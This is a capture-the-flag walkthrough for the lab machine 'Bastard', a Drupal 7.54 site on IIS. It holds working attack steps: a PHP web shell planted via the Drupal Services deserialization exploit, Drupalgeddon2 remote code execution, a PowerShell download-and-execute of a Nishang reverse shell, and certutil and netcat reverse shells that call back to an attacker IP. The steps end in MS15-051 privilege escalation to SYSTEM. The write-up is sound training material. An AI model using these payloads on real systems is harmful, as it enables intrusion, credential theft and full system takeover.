# Bastard

**Reconnaissance:**

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.9

80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Bastard | Bastard

135/tcp   open  msrpc   Microsoft Windows RPC

49154/tcp open  msrpc   Microsoft Windows RPC
```

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.9

All 1000 scanned ports on 10.10.10.9 are in ignored states.
```

We have three open ports:

* Port 80: running Drupal 7 on Microsoft IIS
* Ports 135 and 49154: running Microsoft Windows RPC

The web server is IIS 7.5, which is the default IIS version for Windows 7 / Server 2008 R2, and it is hosting Drupal 7.

**Enumeration: Drupal TCP 80**

Visit the web application in the browser.

```
http://10.10.10.9/
```

It’s running Drupal, a free and open-source content management framework. Let’s look at the CHANGELOG to get the exact version.

```
http://10.10.10.9/CHANGELOG.txt
Drupal 7.54, 2017-02-01
```

Let’s try to find credentials for this application. I googled “default credentials drupal” but didn’t find anything useful. Next, I tried common credentials such as admin/admin and admin/password, but was not able to log in.

When the target is off-the-shelf software, I usually don’t brute-force the login, because it probably has a lockout policy in place.

**Searchsploit:**

Next, run searchsploit.

```
┌──(kali㉿kali)-[~]
└─$ searchsploit drupal 7
```

Let’s mirror exploit 41564 and look at it.

```
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 41564
  Exploit: Drupal 7.x Module Services - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/41564
     Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
    Codes: N/A
 Verified: True
File Type: C++ source, ASCII text
Copied to: /home/kali/41564.php
```

The exploit links to the Ambionics write-up below. It is a deserialization vulnerability in the Drupal Services module that leads to Remote Code Execution (RCE). Looking at the code, we see that it targets the path `/rest_endpoint` to conduct the exploit.

{% embed url="<https://www.ambionics.io/blog/drupal-services-module-rce>" %}

```
$url = 'http://vmweb.lan/drupal-7.54';
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';
```

That path does not exist on this box; if we simply change it to /rest, however, it works:

```
http://10.10.10.9/rest
```

So it is using the Services module. We’ll use this exploit to gain an initial foothold on the box.

**Foothold:**

Make the following changes to the exploit code.

```
$url = 'http://10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

$file = [
    'filename' => 'shell.php',
    'data' => '<?php system($_REQUEST["cmd"]); ?>'
];
```

Run the exploit.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ php 41564.php 
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce

#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: 10.10.10.9/shell.php
```

Perfect! It created two files: session.json and user.json. View the content of user.json.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ cat user.json 

"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
```

I can identify that hash as Drupal 7 (hashcat mode 7900) and try to crack it:

{% embed url="<https://hashcat.net/wiki/doku.php?id=example_hashes>" %}

```
hashcat -m 7900 '$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE' /usr/share/wordlists/rockyou.txt --force
```

The hash must be single-quoted: unquoted, the shell would expand `$S` and `$D` as variables and mangle it.

However, that was going to take about three days on my system, and I don’t really need the password at this point.
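The cost is baked into the hash itself. What follows is an added example, not part of this write-up or of Drupal’s own code: a Python port of Drupal 7’s `_password_crypt()` that parses the `$S$` hash from user.json and shows that the `D` in the fourth position means 2^15 = 32768 chained SHA-512 rounds per guess, which is why a rockyou run takes days on one CPU.

```python
import hashlib

# Added example (not from the write-up): a port of Drupal 7's _password_crypt()
# from includes/password.inc, to read the work factor out of a stored hash and
# to check a candidate password the way user_check_password() does.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55  # DRUPAL_HASH_LENGTH: stored hashes are truncated to 55 chars
PAGE_HASH = "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"  # from user.json

def _password_base64_encode(data: bytes) -> str:
    """Drupal's phpass-style base64: each 3-byte group -> 4 chars, low bits first."""
    out = []
    for k in range(0, len(data), 3):
        group = data[k:k + 3]
        value = int.from_bytes(group, "little")       # b0 | b1 << 8 | b2 << 16
        out.extend(ITOA64[(value >> (6 * j)) & 0x3F] for j in range(len(group) + 1))
    return "".join(out)

def inspect_hash(stored: str) -> dict:
    """Split a $S$ hash into its fields; the 4th char is log2 of the round count."""
    if len(stored) != HASH_LENGTH or not stored.startswith("$S$"):
        raise ValueError("not a Drupal 7 SHA-512 hash")
    count_log2 = ITOA64.index(stored[3])
    return {"algo": "sha512", "count_log2": count_log2, "rounds": 1 << count_log2,
            "salt": stored[4:12], "digest": stored[12:]}

def password_crypt(password: str, setting: str) -> str:
    """Hash password under a 12-char setting: '$S$' + cost char + 8-char salt."""
    setting = setting[:12]
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:  # DRUPAL_MIN_HASH_COUNT .. DRUPAL_MAX_HASH_COUNT
        raise ValueError("hash count out of range")
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):  # 'D' -> 2**15 = 32768 chained SHA-512 rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _password_base64_encode(digest))[:HASH_LENGTH]

def check_password(password: str, stored: str) -> bool:
    """Recompute under the stored hash's own setting and compare, as Drupal does."""
    return password_crypt(password, stored) == stored

if __name__ == "__main__":
    info = inspect_hash(PAGE_HASH)
    print(f"{info['algo']} x {info['rounds']} rounds, salt {info['salt']}")
```

Every candidate costs 32769 SHA-512 computations, so the rounds, not the wordlist size alone, set the cracking time.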

user.json gives us the admin user’s password hash. We could keep running it through a password cracker, but we don’t need to, because session.json gives us a valid session cookie for the admin user:

```
┌──(kali㉿kali)-[~/Desktop]
└─$ cat session.json
{
    "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
    "session_id": "FVOXx3tasjzJLhRuUq_k33sXCbkWyfx7-9TuHjMEWI0",
    "token": "3eJjQU7S1jUPgVIwYOeyR26UvQntmh9XPXN_B13VB4U"
}
```

The web shell the exploit wrote is also reachable:

```
http://10.10.10.9/shell.php?cmd=dir
```

**Exploit: Ruby Script**

Reading about Drupalgeddon2 (CVE-2018-7600), it seems the exploit discussed there tests the vulnerability on a Drupal 8-specific path, which is not what this Drupal 7 box runs.

{% embed url="<https://unit42.paloaltonetworks.com/unit42-exploit-wild-drupalgeddon2-analysis-cve-2018-7600/#pu3blic-exploits>" %}

I’ll try the Ruby script instead (`searchsploit -m exploits/php/webapps/44449.rb`). Running it with no arguments returns the usage text, and a warning:

```
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m exploits/php/webapps/44449.rb
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449
     Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
    Codes: CVE-2018-7600
 Verified: True
File Type: Ruby script, ASCII text
Copied to: /home/kali/Desktop/44449.rb

┌──(kali㉿kali)-[~/Desktop]
└─$ ruby 44449.rb 
Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]
Example for target that does not require authentication:
       ruby drupalgeddon2.rb https://example.com
Example for target that does require authentication:
       ruby drupalgeddon2.rb https://example.com --authentication
```

I’ll fix the warning about `\r` line endings with dos2unix, then run it against the target:

```
┌──(kali㉿kali)-[~/Desktop]
└─$ dos2unix 44449.rb
dos2unix: converting file 44449.rb to Unix format...

┌──(kali㉿kali)-[~/Desktop]
└─$ ruby 44449.rb http://10.10.10.9/

drupalgeddon2>> whoami
nt authority\iusr

drupalgeddon2>> cd \dimitris
drupalgeddon2>> dir
```

**Shell: Nishang**

I can upgrade this to a Nishang shell by grabbing a copy of Invoke-PowerShellTcp.ps1, appending a call to the function at the end of the file (shown below), and then serving that directory with `python3 -m http.server 80`. I’ll also open a nc listener on port 443.

{% embed url="<https://github.com/samratashok/nishang>" %}

```
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 443
```

```
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 443
```

Then I give this command to the Drupalgeddon2 shell:

```
drupalgeddon2>> powershell iex(new-object net.webclient).downloadstring('http://10.10.14.2/shell.ps1')
```

My Python web server gets the request for shell.ps1 and serves it. When shell.ps1 runs, it loads all the functions and then invokes the reverse shell back to me on port 443, which I catch in nc:

```
PS C:\inetpub\drupal-7.54>whoami
nt authority\iusr
```

**Privesc: MS15-051**

We use `whoami /priv` to check our user’s privileges and see that we hold SeImpersonatePrivilege. We already know this one from other machines we have solved: it can be abused to impersonate nt authority\system.

```
PS C:\inetpub\drupal-7.54> whoami /priv
PS C:\inetpub\drupal-7.54> systeminfo
```

As systeminfo shows, we are on Windows Server 2008 R2, for which several kernel-level exploits exist that we could also use. We’ll go with MS15-051.

I’ll grab a compiled copy from here:

{% embed url="<https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip>" %}

```
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80

PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.2/nc64.exe
PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.2/ms15-051x64.exe
PS C:\inetpub\drupal-7.54> dir
PS C:\inetpub\drupal-7.54> .\nc64.exe -e cmd.exe 10.10.14.2 443

┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443
```

```
C:\inetpub\drupal-7.54>.\ms15-051x64.exe "whoami"
.\ms15-051x64.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 2532 created.
==============================
nt authority\system

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr

C:\inetpub\drupal-7.54>.\ms15-051x64.exe ".\nc64.exe -e cmd.exe 10.10.14.2 443"
```

```
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>type root.txt
```
